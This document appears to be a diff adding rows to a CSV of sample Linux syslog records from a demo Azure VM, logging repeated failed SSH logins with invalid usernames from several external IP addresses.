+15526,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:18:13,UbuntuDevEnv,2019-06-26 06:18:13,auth,UbuntuDevEnv,info,Failed password for invalid user caijie from 45.59.69.138 port 55794 ssh2,27108,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,caijie,45.59.69.1,55794,,
+15527,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:18:13,UbuntuDevEnv,2019-06-26 06:18:13,auth,UbuntuDevEnv,info,Disconnected from invalid user caijie 45.59.69.138 port 55794 [preauth],27108,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,caijie,45.59.69.1,55794,,
+15528,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:18:13,UbuntuDevEnv,2019-06-26 06:18:13,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 55794:11: Bye Bye [preauth],27108,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,55794,,
+15529,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:18:13,UbuntuDevEnv,2019-06-26 06:18:13,auth,UbuntuDevEnv,info,Failed password for invalid user hadoop from 139.99.98.248 port 49270 ssh2,27105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,139.99.98.2,49270,,
+15530,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:18:14,UbuntuDevEnv,2019-06-26 06:18:13,auth,UbuntuDevEnv,info,Disconnected from invalid user hadoop 139.99.98.248 port 49270 [preauth],27105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,139.99.98.2,49270,,
+15531,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:18:14,UbuntuDevEnv,2019-06-26 06:18:13,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 49270:11: Bye Bye [preauth],27105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,49270,,
+15532,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:18:14,UbuntuDevEnv,2019-06-26 06:18:14,auth,UbuntuDevEnv,info,Failed password for invalid user system from 106.12.27.140 port 44870 ssh2,27104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,system,106.12.27.1,44870,,
+15533,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:18:14,UbuntuDevEnv,2019-06-26 06:18:14,auth,UbuntuDevEnv,info,Disconnected from invalid user system 106.12.27.140 port 44870 [preauth],27104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,system,106.12.27.1,44870,,
+15534,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:18:14,UbuntuDevEnv,2019-06-26 06:18:14,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 44870:11: Bye Bye [preauth],27104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,44870,,
+15535,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:19:13,UbuntuDevEnv,2019-06-26 06:19:13,auth,UbuntuDevEnv,info,Invalid user all from 106.12.27.140 port 52848,27698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,all,106.12.27.1,52848,,
+15536,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:19:13,UbuntuDevEnv,2019-06-26 06:19:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,27698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15537,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:19:13,UbuntuDevEnv,2019-06-26 06:19:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,27698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15538,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:19:14,UbuntuDevEnv,2019-06-26 06:19:14,auth,UbuntuDevEnv,info,Failed password for invalid user all from 106.12.27.140 port 52848 ssh2,27698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,all,106.12.27.1,52848,,
+15539,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:19:15,UbuntuDevEnv,2019-06-26 06:19:14,auth,UbuntuDevEnv,info,Disconnected from invalid user all 106.12.27.140 port 52848 [preauth],27698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,all,106.12.27.1,52848,,
+15540,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:19:15,UbuntuDevEnv,2019-06-26 06:19:14,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 52848:11: Bye Bye [preauth],27698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,52848,,
+15541,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:19:41,UbuntuDevEnv,2019-06-26 06:19:40,auth,UbuntuDevEnv,info,Invalid user vliaudat from 45.59.69.138 port 45124,27803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vliaudat,45.59.69.1,45124,,
+15542,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:19:41,UbuntuDevEnv,2019-06-26 06:19:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,27803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15543,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:19:41,UbuntuDevEnv,2019-06-26 06:19:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,27803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15544,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:19:43,UbuntuDevEnv,2019-06-26 06:19:43,auth,UbuntuDevEnv,info,Failed password for invalid user vliaudat from 45.59.69.138 port 45124 ssh2,27803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vliaudat,45.59.69.1,45124,,
+15545,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:19:43,UbuntuDevEnv,2019-06-26 06:19:43,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 45124:11: Bye Bye [preauth],27803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,45124,,
+15546,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:19:43,UbuntuDevEnv,2019-06-26 06:19:43,auth,UbuntuDevEnv,info,Disconnected from invalid user vliaudat 45.59.69.138 port 45124 [preauth],27803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vliaudat,45.59.69.1,45124,,
+15547,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:19:52,UbuntuDevEnv,2019-06-26 06:19:51,auth,UbuntuDevEnv,info,Invalid user dz from 139.99.98.248 port 38182,27841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dz,139.99.98.2,38182,,
+15548,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:19:52,UbuntuDevEnv,2019-06-26 06:19:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,27841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15549,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:19:52,UbuntuDevEnv,2019-06-26 06:19:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,27841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15550,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:19:54,UbuntuDevEnv,2019-06-26 06:19:53,auth,UbuntuDevEnv,info,Failed password for invalid user dz from 139.99.98.248 port 38182 ssh2,27841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dz,139.99.98.2,38182,,
+15551,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:19:54,UbuntuDevEnv,2019-06-26 06:19:54,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 38182:11: Bye Bye [preauth],27841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,38182,,
+15552,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:19:54,UbuntuDevEnv,2019-06-26 06:19:54,auth,UbuntuDevEnv,info,Disconnected from invalid user dz 139.99.98.248 port 38182 [preauth],27841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dz,139.99.98.2,38182,,
+15553,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:20:08,UbuntuDevEnv,2019-06-26 06:20:08,auth,UbuntuDevEnv,info,Connection closed by 45.55.190.46 port 46314 [preauth],27820,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,46314,,
+15554,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:20:19,UbuntuDevEnv,2019-06-26 06:20:19,auth,UbuntuDevEnv,info,Invalid user hacker from 106.12.27.140 port 60826,27942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hacker,106.12.27.1,60826,,
+15555,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:20:19,UbuntuDevEnv,2019-06-26 06:20:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,27942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15556,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:20:19,UbuntuDevEnv,2019-06-26 06:20:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,27942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15557,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:20:21,UbuntuDevEnv,2019-06-26 06:20:20,auth,UbuntuDevEnv,info,Failed password for invalid user hacker from 106.12.27.140 port 60826 ssh2,27942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hacker,106.12.27.1,60826,,
+15558,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:20:21,UbuntuDevEnv,2019-06-26 06:20:20,auth,UbuntuDevEnv,info,Disconnected from invalid user hacker 106.12.27.140 port 60826 [preauth],27942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hacker,106.12.27.1,60826,,
+15559,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:20:21,UbuntuDevEnv,2019-06-26 06:20:20,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 60826:11: Bye Bye [preauth],27942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,60826,,
+15560,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:21:12,UbuntuDevEnv,2019-06-26 06:21:11,auth,UbuntuDevEnv,info,Invalid user test9 from 45.59.69.138 port 34456,28134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test9,45.59.69.1,34456,,
+15561,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:21:12,UbuntuDevEnv,2019-06-26 06:21:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,28134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15562,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:21:12,UbuntuDevEnv,2019-06-26 06:21:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,28134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15563,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:21:14,UbuntuDevEnv,2019-06-26 06:21:14,auth,UbuntuDevEnv,info,Failed password for invalid user test9 from 45.59.69.138 port 34456 ssh2,28134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test9,45.59.69.1,34456,,
+15564,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:21:14,UbuntuDevEnv,2019-06-26 06:21:14,auth,UbuntuDevEnv,info,Disconnected from invalid user test9 45.59.69.138 port 34456 [preauth],28134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test9,45.59.69.1,34456,,
+15565,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:21:14,UbuntuDevEnv,2019-06-26 06:21:14,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 34456:11: Bye Bye [preauth],28134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,34456,,
+15566,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:21:18,UbuntuDevEnv,2019-06-26 06:21:17,auth,UbuntuDevEnv,info,Invalid user parc from 106.12.27.140 port 13799,28152,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,parc,106.12.27.1,13799,,
+15567,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:21:18,UbuntuDevEnv,2019-06-26 06:21:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,28152,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15568,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:21:18,UbuntuDevEnv,2019-06-26 06:21:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,28152,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15569,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:21:20,UbuntuDevEnv,2019-06-26 06:21:19,auth,UbuntuDevEnv,info,Failed password for invalid user parc from 106.12.27.140 port 13799 ssh2,28152,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,parc,106.12.27.1,13799,,
+15570,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:21:20,UbuntuDevEnv,2019-06-26 06:21:20,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 13799:11: Bye Bye [preauth],28152,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,13799,,
+15571,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:21:20,UbuntuDevEnv,2019-06-26 06:21:20,auth,UbuntuDevEnv,info,Disconnected from invalid user parc 106.12.27.140 port 13799 [preauth],28152,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,parc,106.12.27.1,13799,,
+15572,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:21:33,UbuntuDevEnv,2019-06-26 06:21:32,auth,UbuntuDevEnv,info,Invalid user miner from 139.99.98.248 port 55334,28208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miner,139.99.98.2,55334,,
+15573,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:21:33,UbuntuDevEnv,2019-06-26 06:21:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,28208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15574,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:21:33,UbuntuDevEnv,2019-06-26 06:21:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,28208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15575,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:21:35,UbuntuDevEnv,2019-06-26 06:21:34,auth,UbuntuDevEnv,info,Failed password for invalid user miner from 139.99.98.248 port 55334 ssh2,28208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miner,139.99.98.2,55334,,
+15576,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:21:35,UbuntuDevEnv,2019-06-26 06:21:34,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 55334:11: Bye Bye [preauth],28208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,55334,,
+15577,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:21:35,UbuntuDevEnv,2019-06-26 06:21:34,auth,UbuntuDevEnv,info,Disconnected from invalid user miner 139.99.98.248 port 55334 [preauth],28208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miner,139.99.98.2,55334,,
+15578,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:22:27,UbuntuDevEnv,2019-06-26 06:22:26,auth,UbuntuDevEnv,info,Invalid user student04 from 106.12.27.140 port 21777,28402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student04,106.12.27.1,21777,,
+15579,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:22:27,UbuntuDevEnv,2019-06-26 06:22:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,28402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15580,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:22:27,UbuntuDevEnv,2019-06-26 06:22:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,28402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15581,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:22:29,UbuntuDevEnv,2019-06-26 06:22:28,auth,UbuntuDevEnv,info,Failed password for invalid user student04 from 106.12.27.140 port 21777 ssh2,28402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student04,106.12.27.1,21777,,
+15582,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:22:29,UbuntuDevEnv,2019-06-26 06:22:29,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 21777:11: Bye Bye [preauth],28402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,21777,,
+15583,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:22:29,UbuntuDevEnv,2019-06-26 06:22:29,auth,UbuntuDevEnv,info,Disconnected from invalid user student04 106.12.27.140 port 21777 [preauth],28402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student04,106.12.27.1,21777,,
+15584,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:22:46,UbuntuDevEnv,2019-06-26 06:22:46,auth,UbuntuDevEnv,info,Invalid user admin from 45.59.69.138 port 52026,28469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,45.59.69.1,52026,,
+15585,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:22:46,UbuntuDevEnv,2019-06-26 06:22:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,28469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
